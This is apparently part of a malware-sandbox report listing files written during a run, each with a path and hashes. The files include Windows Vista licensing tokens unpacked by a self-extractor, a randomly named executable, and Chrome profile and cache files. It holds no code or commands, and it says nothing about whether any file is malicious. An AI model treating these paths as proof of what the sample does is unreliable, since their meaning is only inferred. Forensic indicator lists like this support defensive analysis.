SHA256 af37a6a01bf769051e4ae9e888b903b2a55d5786511b42d6bfc61b1d04d25a84
SHA512 ac1f2c0a7de712d3b989d4fafd9fc2739550454b2f26b2298258a117a5916fe81dffb193899910a4b40dd6ea25d82647feba485dcc3c60dcdca26a4cfb38e34c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\StickyNotesLicensing-ppdlic.xrm-ms

MD5 d975886ec992bbb6b985f4d5f54a5d8d
SHA1 e99984b91934f95590e15e9a0ca9f4d2f54f7247
SHA256 078e6f340c99aa738cc0d30a4eef148e83b4ff6aa6877b6dcbd78ca6a4352f29
SHA512 cf9283a47714f1ce527266b040a9278cb7c733da102a52d4a4b6c242968d93da803aa795ea8d741d95fa8e8678d5acbc65f3bc83495eabe7bbb081f8b36c7f34

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 8258842386390b3f224ffc5c95b158f4
SHA1 486248184a475a6a5da323b46d6f4680ea4ffae7
SHA256 da20ecbbed297dad750f83681e5684de7b263c62e2db19772725ac62c76c67ea
SHA512 1e1003c87686331ac48a970b974ced1a5a2ee070238739cd2fd6af142007bfb6610be961220e606c8d15f093129197b6d2b01a71b419653c16e9c8005ee71cae

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 c74b672815841cb621c81bd6e907148d
SHA1 d511ad8f39e39ae31188b49a6096b238f9c706a3
SHA256 28353c379ff4368566bbe2f03c6f9a89dd4290b5018cb1e535f3aa9c18b971ed
SHA512 ac3ffd58922ee8aca46e17d74ce780a52f24ad9a2488ec4c6d59dd8b75f973927a7b1b89fac8ddab89b2f2914b8d8d8a0192bfc26f897faf2ef9ff0a799bafd0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 e18c40ca0cb2ec2e63950872f80d7907
SHA1 a287fdfbd54869fd23d46f5b07faabbdbc4a7f28
SHA256 b879a56786cfa555b679590f064e10c1903960fb51131ba6253b71415be79ca0
SHA512 dffc0d874b821a081a883f3ad4ce4760c4a1c277973ac68a4de3542da945442220632470d29d43b382b782297e5a0c4f56aa3cf2e8d635a770fcf7485c549f8f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell32-license-ppdlic.xrm-ms

MD5 f8e68c039d4391b4ce8c7db9503a5d16
SHA1 46254944b2c36b155f902dbca9bc421c0c933f37
SHA256 2f0202de9a6c1dfd892fef87d3f1a9086e0dc0584166f886078e3b6c5471c48a
SHA512 79925026e0bcd89044ca3e8ca5c89427d244a3ae8f45de74e0f45a0f46f4c6e3322ab71a35b11aa31bc5936c41351834708b69d0360bdfae315aeb7c410a0a70

C:\Users\Admin\AppData\Local\uqYSWxaeuFFyjjkuPG1qx1NZ.exe

MD5 15e7cc568611decda017546e0deac552
SHA1 d7462886312e041f012c43e2fb14ee5606904289
SHA256 73e23e096558e7eb4f0744b44a7f2d2292a8290c12754c494c08d556982967c1
SHA512 5697258633c454811ced175a581c7d95146b8f4ad2ebab0b6f599f956fc2ce113303c611ad3e471c33b8d86b918e758fb2948bb1d8bdb6a3ab7724769cdf4dca

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 1f810139b734d9eeeeaf38830098001d
SHA1 ce81976eab6a5ca23cf0fe2dc9698a7de71100c4
SHA256 e0fe3041abc7f72a6ec701bc37b1fb01bc8ada1cf63f6da083a143a5e1fece11
SHA512 589fc1b7c7d20cc4db6ec37a5bf57dd822a282b889bb755393c334a300272650dc11d6b57086a7ae3409f42cdc85e339a0c133a8da13dfc263821cb39571a385

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000027

MD5 6a5dd1d8bca1e91afaaf203d1e9c9ef8
SHA1 00a130d288e0e3e3621c5961dee8b934fecc2d54
SHA256 db88088ab42e35955fb7614597fbdca3c25600ed0556febb44494069df605aef
SHA512 4c14d0f0537fd23bb8a881cdd76003a5e0aeb9bba19a9f404b66afd21ffe3238313b3c77332f3db1c7223dae6c05b76be95bb3e79bdf617a5fa8b023e49335b6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

MD5 609262af4b5aed721d5a82480be1004e
SHA1 0f6e12d719b5ee65a98ea5e5c5887abfe3c00408
SHA256 649674e87a90ae80d5f886bf2f6974ba32282a669d0d5619adf550b5c669e05e
SHA512 712ff9c297b5519d6f3182614683ce87fc37fb00f1c43df3c2816655d06cabec0441a56d2aac441056f9e9c318b7bdbdbeb0e00c36a7dbe8d611482009d39299

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 20a5db3003e1ca92bbba0cde89aaf9c8
SHA1 2d3540d1551da7f6f34b67cb8b2c231ae3072f66
SHA256 16c941b897beac91a95a5f87246006a0528a48edcb38bdf95ae45a5d69d68d2c
SHA512 f47020bc2ed4cd08818b0dc566a54f2230dd6edfc5c0584a1190e42ac2ee0e6dd7b6d8a4648183430d6d534870334e1235183637254199e19ee7deb93b8b9ae2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCAccessories-ppdlic.xrm-ms

MD5 7272640063120b9d540554478464b65c
SHA1 d1ec1f1a1a2e81a365e75c1110bca8a1fbccfe92
SHA256 9c269dc23fc9db6553a4b1fa043194d1392a1c29fc5a46635013140645af9360
SHA512 ab1e447c9cf4acc07134ffeb7e992443c1ef375dcd9d1d7b908278f02c0cef8d42038ff9f08874c52ca6aa75dded4c2b9384e8d12ca942a726f2c2425be4b5f9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCCoreInkRecognition-ppdlic.xrm-ms

MD5 149d1b24df36956cb0331f7f8cee54ad
SHA1 479ada396bfd24c83e79d4e76e894f72c17d6a7e
SHA256 5d21f98296b4527df4b1c0d19b61f060f51dcfce41c12d59d8473e6b7db214d0
SHA512 b401898e6b55236de11c8233e3fb576495f30220e49f8ec5aa42fb2d95e37aaea2b2eddbecf88f4755a3ed459fd389040cb245341564ec8de01557fd126604cf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

MD5 dd430e13935bd532d7ecbcc9aa7d8a60
SHA1 2b300570bd6b4b17d4c67ddbc465a8922de2cfdd
SHA256 a3df6dee7af91883dec6523c9b30d14b30375345298b389eeb12567820eb4129
SHA512 dc59e83ef0199b5262f786d4f621d8a6a097cfd026a6ab5cbfce48b61b94fd3378799e968a79f738487be821a75ade77243b3fa1d816c26947518d8a74af1356

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

MD5 d3a09ff0a84d6dee3443e534625962fe
SHA1 ac4322c8e6b83fd862443e077b2e22512b704d8e
SHA256 c09e036a9d6dbc66987914365212d98177d542263d54916da3848b72e3952993
SHA512 7bcf7d3114be82f992e82ce2c96c50a3b3ee2272086ad91c27395e152dee1a55b4c6100d7d61d97d9cbc3496ef4edd5606447c5d9f857821ea49d1d1f0e6ccb4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms

MD5 4de3c2190b1dac1486949271fd6a280c
SHA1 aafed3bc8d8aac53a32ebcc09889cc49b8452963
SHA256 c425d093109c62de70a2451b11e51c5e2b9773ce7145584c3a65fd277ac32952
SHA512 81fb783ae4748dc94e0380d1832fd369872da5c7e09beb14ca9d1fcd361e7b5c0fe92e3935bae7560cf62db2dfc37633658bd19aea1082fd362b1a362488ee22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms

MD5 c446b03359b9d7c16545fd35c40d6e1f
SHA1 da4efb3594ec69bec631258785939668271519fa
SHA256 acc5c5b9d1845aa070d2aa2b2c36a7b50c7d3ff7d7f67dcf4469f26f3f50eeed
SHA512 65f62bc8ad8351db02f896177fd7a36d949dc26d05d7e8d747f9f893e760d1918d8673a6f31eae5d8232ef69476a739ab34ac769f17df5cd502b0e7c80925925

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000029

MD5 60dc5573fef99a512c03366591f41e6d
SHA1 a4451c959a87933b43f1d157a5e0352836655b4b
SHA256 6e0e197e31cabe84c8d91bc9f31e80a8c1a393ef87d210da8d758976c7e93319
SHA512 a13c7912e3878eded0d61b7473f0e7bb377f9940a70c894e44e5566621f061e71dab13ad552dfb7ce6d2ec97a96e9a66d3ba6502bd53c8bf86c7b37ccb8d8b9e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

MD5 3ca0859b2168810f457fda1be911390d
SHA1 1b8f4cd291f3405be6837ed79a3a1d7c521ff6a8
SHA256 ea509f1b977d7b48e16d27c5ed855ddf159af74d9d3c620a448042a4cc9c7faa
SHA512 0d095daecc7caef7f7a27e55f55958fcd99e81e5b74bb3f0ef9eff85c2ebf01c08b7d6d9403760c6a97c0b81a78823d7e60b0fb016831e212053a635cb54ced3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a

MD5 45151e115d6a562d0f38248ba211d7fc
SHA1 fa628332cdb842c012e7e907b9294540fa04d05f
SHA256 78c45818f2e8aed0304d9055a1f0cbfecc76a0394978122f01b6f5ddbfcc4544
SHA512 ccc1530d0046835ae6cabdba7544e7275719a653fbcf8520796d703a13e1ac13269123e3bac0b55f445ee65a27a0c9c5283d7e453d97ccb1358add13ff503897

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

MD5 f335602886273eaaedfcf7fda09205a5
SHA1 431e043485c43b6f8319b02b314bb06b3007fda9
SHA256 104f50b16888aa6516511ba1c857251a670dce68468f22b0843d2bd8e8f443cf
SHA512 f56cdc4fe916918f25417cc949ec00cf65716f1aaae49aabdd0b080cb8850adf4c0111f0024153dc3ed54cbfcd490d988f722404c2497130848ada94230c8958

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8b94c95a4d576f5624371ea353bb5804
SHA1 b0ed1813d8f110f288b3d1cd14ad133b16839eff
SHA256 303a1ec70c5bbd38d3d4a46ad397a8018c809a5b0c306be610c537794973aaa5
SHA512 3b0e0d6319bc4800fc74b664ca0fb0a4df376605868ecd229ed98341afcea9b7765aeefaa773bebf8c0e7c200ca4147d58385397e5f116d82ab7c102182587eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002e

MD5 fb8847a8fd9118a6d19873253afefd38
SHA1 9ac2768b30f1924532d065f7bd2af8c7ac00e67b
SHA256 94eed400d16851d95b69b4c87c4d74ccc128bbff2d073b9a08bfb818f12fb9d4
SHA512 2b962ba036bbb9605deeee11df6208e9a138cc9b0e9bfa4dabe71a45a764aa03e3f8086e6d1b01aacdf78c132a252ea700e3ae7b457d426ed116bda934eb38ac

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-RemoteApplications-ClientSku-ppdlic.xrm-ms

MD5 64c9ef528365fa88c242788284cdee52
SHA1 d9ef36821b43259c70c9c073b686b359834316a7
SHA256 58347e70e3db56274e60c30f85b4eb6f07b12e6febfa11a0e253a23991399845
SHA512 1be35ac973d0f9c08b1fe6935a86e16fb4bdfe29086381c89b58bd6cff99ca1138edfffa0569e185c3d5a2901d4a6f4bf111ec40f79201634831c5098f01b4a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

MD5 de2b1a746789eaec33c0bdc739e73ebe
SHA1 e9bdaef24334534465bcf684d7cca627a8e48830
SHA256 9ed9d7372a34415edcbd4daac357a093d12cb0dde40706e8c86b2bf0218bc58d
SHA512 71433aaa9b5de49ac6959795a46e020d9a011ee4068a15394563d9016ba8daa2fd2bbc76499782e958f707652e1cc0e884de716cf76512fc3dac929a01420d12

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

MD5 47584606a5c47f8d3fc084ece3d87506
SHA1 24e860209289fab401c23bd28dd80f0a3b49338f
SHA256 85d1d8aedf16a12488385249eb02898be10546aa3008e31ba7c576209000ffd7
SHA512 4300fed05fa886019b1b4a5d06fd94a6a96f6b079030e21ef6a5d3c360c895830fbaa91b3766e5e326f6cb587b09e7931dd4e05ea72247b6c1fcd77142d47828

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

MD5 ccfb85db7c733c8aa089b15fcc58d41b
SHA1 98818589f905873349322c709f1d883c742004fb
SHA256 343b7f559f00c74c6415c09de9d15320a005ea24206d6b7396d7467e1b1187d9
SHA512 dff3097d849d14268884a2f36ec4162586eb25a08b430f76ea4973ac0f17281580daf7829fcbb478f4d599c176b3af76a04bf7ba4bd52fdf5e794c191c859936

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000020

MD5 a8e9e4b41715ff464a8ae7f15d01248a
SHA1 c74da4b29baac9a21eb8eb507e96292e58f95454
SHA256 e3812de195d2e175e4dfbb47e674a1e3c68fc3792e785c40ba620e4f1102a02d
SHA512 d21ddd4d4d3524a153601699a4d151e0ff37b8c51b231a65a3e0057e2fa98a8871939113711cb6c714139d31121e7bfd4f54c3abf37f5e0105f7d61ed7d9542a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 10467ac66df48cf41d22c04d35582cf6
SHA1 008cbcdfec57c8f7c9f717ab94115b89ed1eb44b
SHA256 fc31b7c08819c570ef084414f24a18fa143802c915d0cd92feada7cb58dd80f1
SHA512 5549f9bc0df50470b1700fc9bac9d5da86f9b6b8aaec2b770e47cd3e9d7e513fc7c807983084085aec77bf9b0d48ec09ca39b6d2c8df2b844b489211da965243

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 146117f92c0c29ce0ecb1d8a9a0de060
SHA1 c01b27ee60f61d006b62fdb5b9c36e5a1510fef4
SHA256 e45c9756a44b67e6d630cfcd494f6accf8869083202a49771efc025e588e96e6
SHA512 95953417460990b40ed13b4d48385caa829c35456d0346901ed38fba31d0dee08a4109be08bf0ca2a019d85584ccb8cb54e8c84e64771aecb5bd572f9d0b2993

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

MD5 8030a9c3908967bb698242f68d130cb9
SHA1 2329909bd6bb953106aeeef1c45498ab5449ae94
SHA256 c518b7aa9eb2701746a566bdecfb41edb2eed93bd01246d44966381297529157
SHA512 674c6cc90976fafbac31a8b2fe6defbb5450fd55f26e7966383f793448917f7012220904883dbaed8ad9aa2c818ae14fee4d343a9a1cd78f15910b4523e908d9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

MD5 831386df0549d4452307a962fa782465
SHA1 2ff55d009cbfc9052e16911677620198ef238545
SHA256 ec8ffb5c3c528bea30df8086343a740ad79d49080167fcc823bb0b3c01a3c9a8
SHA512 5463dd6a6ac6412081a1a39bc730579ea2d83f88d858f8fa7339cbb2a7e76e863312c45c88b3a9d26b55d7fad20c81b002d94c2857f536d8a12e2da2693b06dc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

MD5 d86e613264983282c9ca5509504acd6d
SHA1 fb0246b65bc44a57bc6f0a5dabb52b6daef97df3
SHA256 b8f143e33afaea724cff5eb5dcc5a1df7a253cef9cef9fa4d30aa704174f1152
SHA512 a4cddbfbcb25cad1e28fc63c28c05cf5dae692031264e54a1487eb89ad6b0cd993cc75208959725edb20f4b778ae33306aefb7367071db2521db35bf3cd469b7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

MD5 20834142221aa5a64546b4541b4f7b2e
SHA1 c054bca808e8542bbbf166553c2c57fc34747544
SHA256 884022396eccff6c109c3a571a0881598ab50180d087d58ceb4c4d36f4196852
SHA512 7ddd43f81e912efa40210439fe11c14533efd549693b4a8bdb152cb77ad29e20c72e090df4938e99a610e75c9e5c3a1baa79c165e02aa210147f7601958e1aba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028

MD5 2273633f403cf6571b9331b93f0c8576
SHA1 91736fa1d9068aab334c71b2bca2b3adb7f46264
SHA256 997980b764caa9b4f3ad5fee49479a5d3c07b1a4037f434bf7aa6c6b2190acca
SHA512 54a5e7d8099d4484a1b2cc0be0372706f150b91885379a51d8db62bfb9478bab05c5e094200988fb28f401524a35ffa067a2fefc3049de5db2282aa861f8f647

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 54041a042559f0a5278d47bca29bb0c5
SHA1 2ea883d09377e43f92de80412340d6b64b1fb768
SHA256 ecf0b2cec5bef25e335d6374e18018731e6cc7f40ccac088f2d61f242fe12671
SHA512 e308ac489f5cd43b3bffce776183f9d47fb2d503989ca42e4fc13e6bf87ad27f31cc082c226c16d220007f5d0df375a9fff7df9ecf47577103f467338eb40feb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 9004333844f593b83320e0f80a676f7f
SHA1 4371b63ff04f0d15775d0ac4b3e85ac13a570df7
SHA256 cdc92b8f0b79343de11e1e8f92ea6f8a7888226c7745111c08821e87c09a1679
SHA512 9daeae211b4b8a6dddeb8601a85385727430cc703c84fbb17ccf6f631b084897e7d68e9aab047178664e8b8d42bf7ad5c00caf7eb98640f3501baecc4b53d5ff

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms

MD5 186016555b75261bcd0f9f14711417c3
SHA1 cbae3243fe292e9c4787c26ea62c904260276430
SHA256 3ce0917467b3efd51e1877e2837df2341b95d25d271217fac16d0a2d743be5db
SHA512 d468bf659715ddba92fa4b85566013b827ae95144f1d23b05936ab037d31634e2bffdd1dd7fd19215a7af412ced4eead9a29aadcf6096c62b0470ec8ce3dac22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms

MD5 3664c73e277dd5ca2f8ecfa5dd0f530e
SHA1 effca8435427555f4bf48d15eb5af9f4d5bb0922
SHA256 cff3bad326a43041f8a96aac91fcbf1847336693a6190df5ce681c957e5a4564
SHA512 20a9212194d7eaf2f73abcf030bb493da4f908b1866f9851d319ff5cdd5f9c20a71c52669a91f1d6f8cd6582af7fe750ebfe5edbf66f4336e638e03fe41a92b3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms

MD5 eda1a44cbfd4823ff729c0c2980f4b19
SHA1 d942ca57433e7b5a9b4897f3dae6e79c62a0bab6
SHA256 19f7c0e437f0e1aac79545259992900afb4e39bcfb4f0b2c262d106566e64503
SHA512 e435edac80df8089eba758ad81ef1238dcdfde3a4cf2556abb73cc588a2e4ef05c3452dd90a01f108ea92977a7ecffa907d9f9b1a5938b044a79c6f93a9e4c6a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

MD5 361960a00ed29c0a0cf075cc3fc908ae
SHA1 026ced2ef36075c5e61b7ccc5a4f2c8b11d3436b
SHA256 c15ff470dc5ee45ab9164ac6c071b4bc7ccc0f4bb67466dc27004b7d5b4e9781
SHA512 d561c1d934fe301637ce1361e8c8b599cd6e4e55299e4a81ceba6d43ccf55e134c11377db544501a4b03cbc4deb566bf46d3d6fdb5c5fdd4034187a8ebbcd6de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023

MD5 403f0bce8c0d06c67e6b201fbe9116eb
SHA1 24c116c19923bed209cfc30124c120e1c6e0589c
SHA256 bb0895f60068c98f8708cd9787e90dab24ff8c4e3f8afb62e822b8b660c896fe
SHA512 02b5e5c61656c870f1d7da4aa1742b758fd7708acfb397f029e623e690e21658ac2698ca207ed2dea76b009a5f123774dc7c99fbcde8f51ab8682e6749fd3a9e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

MD5 960f506622c3b6b7de3436763aca8888
SHA1 ef567dd2c71e3ec6bf0ae43ba6f83c66d16ce33e
SHA256 5cc7d40033e2a243c0d5907cc38df4494027e2f8b6c2ca65a5190946333e50fe
SHA512 f7139baccc20e29b94c590a488b551cef493db032af6c7e35dbd26437c9f710d64e36b7cafce4a68349d1f61020c0108b1bd0fe89cc5f4dadb23346605c32d02

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

MD5 b5b897417ffb8027b918e4b0fe592c65
SHA1 8dcdd3872539bb5f0a02b72803f50e982f2154c9
SHA256 db603eef3a1d1387560a563aa534e66f95045534c480110f09f778f536ed46d7
SHA512 8a33f36c42ae71195650ea01266bcb6536332d5c7f6c841e5f7c396b3b3995f93aed0d39f25d56747f14a74b4a93f3ed483fd2fa21163e6433ca07c7254b04d4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002c

MD5 0141232143a147402da02288b23ea4e6
SHA1 83674002ff72e1ddc3fd0c46c7eb4bda4985b8b4
SHA256 f1c9bdfbc72db9625d4188a6759d9047d74d58aca70ec8609aaeefce1cd3ffac
SHA512 f1c3a7e393e0a5e2a22514ff3857fb23da2cb3bdb544d5d240200dcb75642874e891979170cced78352b92778dd35fe594aefe9d2e733896313c196f6bb0e1d3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms

MD5 64835c36eeb2331b56bfac153f5f6df7
SHA1 024f0d3e93d0563420e7364021606f18691216fd
SHA256 ee19f5dcdd812df8138b6de03a45a37cdc9f39a86f245338b0060c1964d18e14
SHA512 e63cef4c52a9bf8d5ed21b2ca5aeed31a50d9b1d7ef61fdae6bad994ff562ff73966385dee82233271232b5434e12f724135f8f3d21db2734587cb26e92ca1d0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms

MD5 76df706a75912ad4a0848db1fe7dc828
SHA1 d0a7a17b0f5b23082b112d24dcf2940240f3a9fa
SHA256 33dd1f53221d3513bf5b29b8a5903ee4250032c5439e3358cd47bf905d2648a9
SHA512 24107d1b3d637a3f8b06d2946d9eedc2e568ae69225661a0ba3f7b3caef134aff33fcd76d0a7f551b7e45668e3b59d9c3c305bbc3bccb5e873425b647d1be861

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCCoreInkRecognitionLicensing-ppdlic.xrm-ms

MD5 2f1a66e0ed3b59db9922e65d8bcb211e
SHA1 df70d39269b1ef4fad2e743455325782d2bca41e
SHA256 f8487b9b24b961f526cc12384cea446675f234cba34db13d9146ea7c4352f82f
SHA512 2f12e23acd9220d9270b31399a1fc7aa3c79a0bf4b8d5f2d1c4cc3b0a3cf4fb8c83bfc174d4f69fbbba994a7a0efa70b848a74d6168f1c591dd48245b78290f6

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCAccessories-ppdlic.xrm-ms

MD5 cb31813f2805d3698ca7bd55d99092d4
SHA1 85947a0e3b794dc16984b883f3b3993eaed7dfad
SHA256 a40725024e549d1979e18510190f9d02ec088ab7ed3178e2db4069b901042e34
SHA512 8d099432245ed722707c503084b1d1a629e8c1f3b69d2ffee7dc6d3c2fd798429463f1423dd50a3f6088dbaebbc0ca7b37196ad356faaadb3288f5ee1d3f9154

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c74a97a1a129b5ced5da0c59ad59b160
SHA1 cb7de0ca316af77674eea874449aa935e49001e2
SHA256 c9d92aa38bfbd61959ccc760e2f90f7be08471238400aa700eaa10bc4912d702
SHA512 8b9ae5c12b1e08c50d90e63a7823720b14e6c4a7cd35610abce85bc324be0c89a06180d9b5a237505889e5dc899cd3b3c5e42fea159df8ef6c97fbbd291016c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002a

MD5 53436aca8627a49f4deaaa44dc9e3c05
SHA1 0bc0c675480d94ec7e8609dda6227f88c5d08d2c
SHA256 8265f64786397d6b832d1ca0aafdf149ad84e72759fffa9f7272e91a0fb015d1
SHA512 6655e0426eb0c78a7cb4d4216a3af7a6edd50aba8c92316608b1f79b8fc15f895cba9314beb7a35400228786e2a78a33e8c03322da04e0da94c2f109241547e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002b

MD5 ced0d4ad1bcd0464fc4df3d1de402441
SHA1 f1e46e8b76222b53c16821cff9ea2af57d6b31dc
SHA256 855fcbd7af49663d5655a881269e234b6f9a9cc9091d01fd75a8891e10d1494d
SHA512 04c6e07e4bb398189ab1d1123638767d0a019eea338c3aa9a4b2d5927f2377c5b1ed85db541cfef0a65bad9adabfbd0db79a272abc433873f4f985e9f0099c8c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 779efd3c91df0caac2e76e5055830364
SHA1 115bf50e6138827f062dd470453b4027d65c6005
SHA256 d8534a7ab6ef3a79f8b47f85ef13b04888ea49b224006c9908ddcc1a442c4406
SHA512 fe643ff15bd67b8f285fd402ddd5ddc311427ac49aaf9fd7b923916e40cada8154bb20c483d20b8c0d8934164845ec94bc30d53d6d210d756fcf5c5df7ed7ab1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms

MD5 4d57c5079a9fcdfddb150aefb3284851
SHA1 687d4ad9fd88c4ff66d61a455ccb6de81ef628ae
SHA256 748f8e14e24feb16bed27a345dcb1ecb2a01bc799a34124152aa7a6cc878d9cb
SHA512 defcaf79317a1bf2af1d19ecc876c782bcfe78b2ed0b59be1d6b80bf290f07b0e75c3be9ca3964273b1675e89ae118e20fa26b7a5d5ae33c9321550630b51d68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000025

MD5 2acaf14fc8f95882b9e5a61e5c6360a2
SHA1 ea92ecc7f902bb7a29bce976a62ee4c323eafa7a
SHA256 f360e3eafe41818c7caa5a15206919657109e8f8dcb6be2433102912349743de
SHA512 3c2827e8f3109de4d9e72047033d07270c3164091f554aea435342f7c7b410cf95230b92f63d922b3e65fe334b12292ab74645858dd8be50d225b0c2051f885f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

MD5 6077382959661e6b4247897245d6458c
SHA1 6645f2b1523da8d9aee0be9be0184730247eeefc
SHA256 89ce000bf51166963443b82b89bcdbb86800e9ec0367eea760abf10a7a8c3e93
SHA512 9d3762f4282469d294cdd6e5b1bcbe80d70bfe039b2222decf2908676dd3dcb5626489b69362e9381e4d2e4a31d73405a1ac612404eed970a4b1daaffa4e635f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 2083be4155fdb7c47cad2070f142539e
SHA1 487b82c0cad62039834c19bae4a38dfa3b82a4f6
SHA256 4733d97b22c247300cc0ed618a259827dc48401792fb8daa8244496ff04ab19e
SHA512 39ae6dd9150bf1a6eafd607f0706273aa1621111a11fc9119b995adc42e43ff8b1379dae056f169c8a5f6cdbfd1108ed3889f7eb467afdcb5e60e54fcd0dfac0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms

MD5 81bbf79232267782b6ca6583edc741bc
SHA1 d386feaaaf5c97c2e948f922dea7a0ac00629142
SHA256 ad68ac46027d6ab2957039363a9bdaff39007291af02281c06171835016ee40c
SHA512 b176fcbfe64e8950ad323bd1e3132b34477ab8b6ba49f6af6858d3d63ea979a0c60d3748ceff759f0d34e19bb804a7ae022cee08f331f092c10e0832ee061227

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPC-MathInputLicensing-ppdlic.xrm-ms

MD5 1d02749f5f142a9a00496a7c3dda3231
SHA1 16921994e010243669144cc2938d27d3b707d20b
